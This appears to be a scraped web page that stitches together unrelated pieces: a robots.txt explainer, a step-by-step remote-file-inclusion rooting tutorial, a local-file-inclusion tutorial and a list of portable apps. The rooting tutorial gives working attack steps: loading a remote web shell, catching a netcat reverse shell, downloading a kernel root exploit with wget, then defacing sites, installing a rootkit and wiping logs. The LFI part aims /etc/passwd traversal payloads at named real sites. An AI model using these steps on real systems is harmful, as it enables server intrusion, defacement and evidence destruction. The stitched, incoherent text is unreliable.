techian.com

Robots.txt harmless? Or dangerous?
By K1u

So alright… what is this strange file in the root of your directories you question?

Let me break down what it basically is… all it basically is, is a rule set for search engines.

Example of a robot.txt file.

# This is my robots.txt file!
User-agent: *
Disallow: /idontwantthisindexedbysearchengines/

Now let me explain what it is line by line.

# This is a User agent… example Firefox or Konqueror, * is anything.
User-agent: *

# This is a rule for search engines not to index this folder.
Disallow: /idontwantthisindexedbysearchengines/

Now lets talk about why robots.txt can be dangerous.

All websites out there that are using the Robots file most likely have it exposed.

Here take this – http://k0h.org/robots.txt

Well your probably asking what do I do now? Instead of using root folders of your “private” things, make a new folder named something like 021873257923 then store the other folder in there. Note… never ever store very important things on your Webserver, even if its protected by robots.txt.

Now lets build our own robots.txt file.

# This is a comment… these are ignored.
User-agent: *
Disallow: /273432087423374242/

User-agent: Googlebot-Image
Disallow: /images

# Alexa’s bot is a bit aggressive so I think I shall make it wait 1 minute (60 seconds) until it can view another page.
User-agent: IA_Archiver
Crawl-Delay: 60

Questions!

Ok… see I have over 300 folders staring with admin… none should be indexed… what do I do? Is there some sort of wildcard I can use?

Simply Disallow: /admin without the ending /.

Are there engines that do not obey robots.txt?

Yep.

My host disallows Robots.txt…

They probably don’t… you just have not tryed selecting view hidden files in your FTP client. Look into others methods… google is your friend.

On a side note. I have not written this in the official tutorial, but alot of people asked me why make a directory 349823423423 for instance and the answer is because it is harder for script kiddies to do a directory name brute force on your site and find out your private directories name.

=======================================================================
R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

Author: An@sA_StAxtH
Mail/MSN: admin@cyberanarchy.org/anasa_staxth@hotmail.com

For Cyber Anarchy (Nov. 2007)
=======================================================================

You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting
in Linux Server with Safe Mod: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site. (www.mysite.com in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to  port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googlin' you can find 'em all  

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

-

  *

Local File Inclusion Tutorial - Written by Xasulrev

[- How to Find LFI Vulnerability -]

How to Find LFI Vulnerability, Well i use me of adding ..
Example

www.site.com/index.php?p=..

Real World Examples:

http://www.jedit.org/index.php?page=..

Warning: main(...html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line
 63

Warning: main(): Failed opening '...html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.
php on line 63

This is not Vulnerable,
A Vulnerable should look like

Warning: include() [function.include]: Failed opening '...php' for inclusion (include_path='.:/usr/share/pear') in /
home/shiner/shiner.com/htdocs/beers/beers-home.php on line 62

include is the code , the script is using for example

$page = $_GET[page];
include($page);
?>

Should be [function.include]
but

$page = $_GET[page];
require_once($page);
?>

should be [function.require_once] or [function.require]

[- Find Example (Real) -]

http://www.crew4sea.com/indexm.php?url=..

Gives us.

Fatal error: require_once() [function.require]: Failed opening required './..' (include_path='.:/:/usr/php/pear'
) in /indexm.php on line 164

 [b][function.require][/b]

So we know it Vulnerable

if Windows OS, you can just do

http://www.crew4sea.com/indexm.php?url=indexm.php

other try

http://www.crew4sea.com/indexm.php?url=/etc/passwd

http://www.crew4sea.com/indexm.php?url=/etc/passwd

http://www.crew4sea.com/indexm.php?url=../etc/passwd

http://www.crew4sea.com/indexm.php?url=../etc/passwd

until you get Something.

With traveling and use of many different computers, many geeks (and geek girls) often find a need to have a uniform set of tools handy wherever we may be. I’ve put together a list of 25 invaluable portable apps that can be installed on an Ipod or Thumb Drive. These are really cool!

1. TrueCrypt – encrypt your thumb drive to protect your information
2. ToDoList – A tak management tool that allows you to repeatedly sub-divide your tasks into more manageable pieces whilst still presenting a clean and intuitive user experience. (Windows Only)
3. Portable Firefox – Leaves no personal information behind on the machine – you can take along your browser/extensions/bookmarks anywhere
4. Pidgin Portable – All-in-one instant messaging (supports AIM, ICQ, MSN Messenger, Yahoo, G-Chat, etc)
5. WS FTP32 – ftp client
6. FileZilla – yet another ftp client
7. Notepad2 – a fast light-weight advanced text editor with syntax highlighting
8. Notepad++ – this is one of my favorite text editors – now made portable
9. Color Cop – this is one of my favorite freeware apps – includes an eyedropper you can drag over any window to grab the color value. It then offers a palette of 42 complimentary colors to the one you’ve picked.
10. Ifranview – a light little graphics viewer/editor that packs a big punch. You can use it to work with screen captures, create slideshows and more
11. GIMP – the popular open source image editor packaged as a portable app – very robust
12. 7-Zip Portable – handles zip, gzip, tar, rar etc
13. Allway Sync – syncs files between your thumb drive and PC
14. Unknown Devices – helps you find out what the unknown devices in the device manager are
15. TestDisk – data recovery software that can recover lost partitions or make drives bootable again
16. UTorrent – my preferred bit torrent client – I love having this with me wherever I go
17. Roeder’s .NET Reflector – recently purchased by Red Gate, this still-free app can be used to explore .NET assemblies, understand relationships between classes and methods, find where types are instantiated and exposed or check that code has been correctly obfuscated before release. There are also over 30 add-ins available.
18. Process Explorer – formerly Filemon and Regmon, this is an invaluable sleuthing tool
19. TightVNC – based on the popular VNC remote control software, this version can live on a thumb drive
20. WinMerge – compares differences between files and merges changes. It has the same features as the desktop version
21. Text2Html – a text to HTML converter – converts text files into HTML format
22. Portable Apps Suite – this is the mac-daddy of them all – it includes Firefox, Thunderbird(email), Sunbird(calendar),ClamWin (antivirus), Pidgin(see above), Sumatra PDF Readable, KeePass Password Safe, OpenOffice, CoolPlayer (audio Player) and even a couple of games
23. Restoration – Recover accidentally deleted files – even after they were deleted from the recycle bin
24. Infra Recorder Portable – cd and dvd burning
25. RockXP – allows you to recover windows passwords or keys, change keys, display system password, and more – sneaky!